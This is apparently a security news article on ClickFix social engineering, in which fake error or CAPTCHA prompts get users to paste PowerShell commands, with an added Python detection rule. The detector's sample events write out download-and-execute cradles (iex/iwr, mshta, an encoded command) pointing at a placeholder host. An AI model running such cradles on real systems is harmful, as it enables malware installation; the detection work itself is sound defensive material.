Microsoft has issued a direct warning: a social engineering technique called ClickFix is being used by both cybercriminals and state-sponsored actors to trick users into executing malicious commands through Windows Terminal and PowerShell. The attacks are simple, effective, and spreading fast.
The technique isn’t new. But its rapid adoption across multiple threat actor groups — including those linked to North Korea, Iran, and Russia — signals that ClickFix has graduated from a niche trick to a mainstream attack vector. Microsoft’s Threat Intelligence team published findings in March 2025 detailing how the method works and who’s using it, as reported by TechRadar.
Here’s how it works. An attacker presents the victim with a fake error message or verification prompt — often disguised as a CAPTCHA, a browser update notification, or a document rendering error. The prompt instructs the user to open Windows Terminal or the Run dialog and paste a command. That command downloads and executes malware. No exploit needed. No zero-day required. Just a human following instructions.
That’s the part that should concern security teams most. ClickFix bypasses technical defenses by targeting the user directly, turning them into the attack vector. The victim manually executes the payload, which means endpoint detection tools that monitor for automated exploitation can miss the initial compromise entirely.
Microsoft identified multiple threat groups deploying ClickFix between late 2024 and early 2025. The North Korean group Kimsuky (tracked by Microsoft as Emerald Sleet) used fake device registration pages to trick targets into opening PowerShell as an administrator and pasting attacker-provided code. The Iranian group MuddyWater embedded ClickFix lures in phishing emails targeting Middle Eastern organizations. And Russian-linked actors used the technique in campaigns against Ukrainian entities, disguising malicious commands as system updates.
These aren’t amateurs. State-backed groups adopting ClickFix tells you something about its effectiveness.
The technique exploits a fundamental gap in how organizations think about security. Most defensive architectures assume malware arrives through files — attachments, downloads, drive-by exploits. ClickFix sidesteps all of that. The user opens a legitimate system tool, pastes a command, and the system does exactly what it’s told. From the machine’s perspective, this looks like authorized activity. The command might invoke PowerShell to download a script from a remote server, which then installs a backdoor, a remote access trojan, or an infostealer. By the time behavioral detection kicks in, the payload is already running.
According to Proofpoint, ClickFix attacks surged dramatically in the second half of 2024, with the firm tracking campaigns across multiple sectors including healthcare, finance, and government. Proofpoint researchers noted that the technique appeared in campaigns delivering a range of payloads including AsyncRAT, Lumma Stealer, and DarkGate. The diversity of malware families deployed through ClickFix underscores how adaptable the method is — it’s essentially payload-agnostic.
So why is it working so well? Part of the answer is psychological. The fake error messages create urgency. Users believe something is broken and they need to fix it. The instructions look technical enough to feel legitimate but simple enough that a non-technical user can follow them. Copy. Paste. Press Enter. Done.
And the delivery mechanisms are getting more sophisticated. Early ClickFix campaigns relied on compromised websites displaying fake browser update banners. Now attackers are embedding lures in phishing emails, fake CAPTCHA pages, spoofed Microsoft 365 login portals, and even GitHub repositories. BleepingComputer reported on campaigns using fake CAPTCHA verification pages that instructed users to open the Windows Run dialog and paste a command — a technique that proved effective even against users who might otherwise be cautious about email attachments.
The security industry has been slow to respond. Most awareness training still focuses on phishing links and malicious attachments. Few programs explicitly warn users about the danger of pasting commands into system terminals. This is a blind spot.
Microsoft’s own recommendations are straightforward: restrict PowerShell execution policies where possible, monitor for unusual command-line activity, and educate users about this specific social engineering pattern. But execution policies can be bypassed, and command-line monitoring generates enormous volumes of telemetry that many security operations centers aren’t equipped to parse effectively. The education piece is probably the most impactful short-term mitigation, and it’s also the hardest to scale.
There’s a deeper structural problem here. Windows gives ordinary users the ability to open PowerShell and execute arbitrary commands. That’s by design — it’s a feature for administrators and power users. But ClickFix turns that feature into an attack surface. Restricting terminal access for standard users would mitigate the risk significantly, yet most organizations haven’t implemented such controls because they break workflows and generate helpdesk tickets. Security versus usability. The oldest tradeoff in the business.
Some vendors are starting to adapt. Group-IB published research in early 2025 documenting ClickFix campaigns targeting hospitality and travel industries, where attackers impersonated booking platforms to deliver malware through the technique. Their analysis showed that the campaigns achieved higher click-through and execution rates than traditional phishing — a data point that should alarm anyone responsible for organizational security.
The numbers tell the story. Proofpoint observed ClickFix techniques in dozens of campaigns totalling tens of thousands of messages in late 2024 alone. Microsoft’s report covers at least four distinct nation-state groups adopting the method within a matter of months. And the barrier to entry for attackers is essentially zero — no exploit development, no vulnerability research, just a convincing fake error message and a one-liner PowerShell command.
This is social engineering at its most efficient. Minimal infrastructure. Maximum impact.
For security leaders, the immediate action items are clear. First, implement application control policies that restrict who can run PowerShell and Windows Terminal. Second, deploy command-line logging and create detection rules for common ClickFix patterns — particularly commands that invoke web requests or download cradles. Third, update security awareness programs to explicitly cover the scenario of pasting commands into system tools. And fourth, assume that some users will fall for it anyway and ensure your post-exploitation detection capabilities are strong enough to catch what happens next.
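The second action item above (and Microsoft's command-line monitoring recommendation earlier in the piece) is easiest to reason about with a concrete detection rule in hand. The following is an added example, not code from Microsoft, Proofpoint or this article: a small scorer that runs over process-creation records of the kind Sysmon Event ID 1 or Windows Security 4688 produce, looks for download-cradle tokens, decodes `-EncodedCommand` payloads (PowerShell expects base64 of UTF-16LE there), and gives extra weight to an interactive parent such as explorer.exe, which is what a paste into the Run dialog looks like. The field names (`parent`, `image`, `cmdline`), the weights, the threshold and all sample records are assumptions constructed for this illustration; the URLs use the reserved `.invalid` domain.

```python
import base64
import re

# Constructed sample process-creation records. Field names are an assumption
# made for this example (roughly Sysmon Event 1 / Windows 4688 shape); every
# value is made up, and example.invalid is a reserved, non-resolving domain.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')"
    .encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    # ClickFix-style paste into Win+R: parent is explorer.exe, inline cradle.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c '
                '"iex (iwr https://example.invalid/x.txt -UseBasicParsing)"'},
    # Remote HTA launched from a terminal session.
    {"parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/v.hta"},
    # Same cradle hidden behind -EncodedCommand.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {ENCODED_PAYLOAD}"},
    # Benign scheduled inventory script.
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    # Benign, if odd, local command with no network or cradle indicators.
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": r'powershell.exe -c "Get-Process | Out-File C:\Temp\p.txt"'},
]

# Indicator categories. Each category counts once per event, however many
# tokens inside it match, so a long command line does not inflate the score.
PATTERNS = {
    "remote_fetch": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression|mshta)\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "evasion": re.compile(
        r"-(?:ep|executionpolicy)\s+bypass"
        r"|-w(?:indowstyle)?\s+hidden"
        r"|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Parents that mean a human typed or pasted the command (Run dialog, shell).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}

WEIGHTS = {"remote_fetch": 2, "inline_exec": 2, "url": 1,
           "evasion": 1, "interactive_parent": 1}
ALERT_THRESHOLD = 4  # assumed tuning value; adjust against your own baseline


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand argument, or '' if none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # bad padding / not base64
        return ""


def analyze(event: dict) -> dict:
    """Score one process-creation record and say whether it should alert."""
    decoded = decode_encoded_command(event["cmdline"])
    # Search the raw line and the decoded payload together so an encoded
    # cradle is judged by the same rules as a plaintext one.
    haystack = event["cmdline"] + " " + decoded
    indicators = [name for name, rx in PATTERNS.items() if rx.search(haystack)]
    if event["parent"].lower() in INTERACTIVE_PARENTS:
        indicators.append("interactive_parent")
    score = sum(WEIGHTS[i] for i in indicators)
    return {"score": score, "indicators": indicators,
            "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


def scan(events: list) -> list:
    """Return the analysis results for every event that crosses the threshold."""
    return [r for r in (analyze(e) for e in events) if r["alert"]]


if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, (analyze(e) for e in SAMPLE_EVENTS)):
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} score={result['score']} parent={event['parent']:<13} "
              f"{result['indicators']}")
```

The point of the weighting is that no single token is damning: `curl` and `https://` appear in plenty of legitimate admin scripts, and `-w hidden` alone is common in scheduled tasks. What ClickFix produces is the combination of a fetch, an inline execute, and a parent process that means a person pasted it, and the rule keys on that combination rather than on any one string. The encoded-command decode step matters because the first sample and the third are the same attack; a rule that only inspects the raw command line catches one and misses the other.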
ClickFix isn’t sophisticated in the traditional sense. It doesn’t exploit software vulnerabilities. It doesn’t require advanced tooling. But it works, and it’s being adopted by some of the most capable threat actors on the planet. That combination — simplicity and effectiveness — is exactly what makes it dangerous. The security industry spent years building defenses against technical exploits. ClickFix reminds us that the weakest link hasn’t changed. It’s still the person sitting at the keyboard.


WebProNews is an iEntry Publication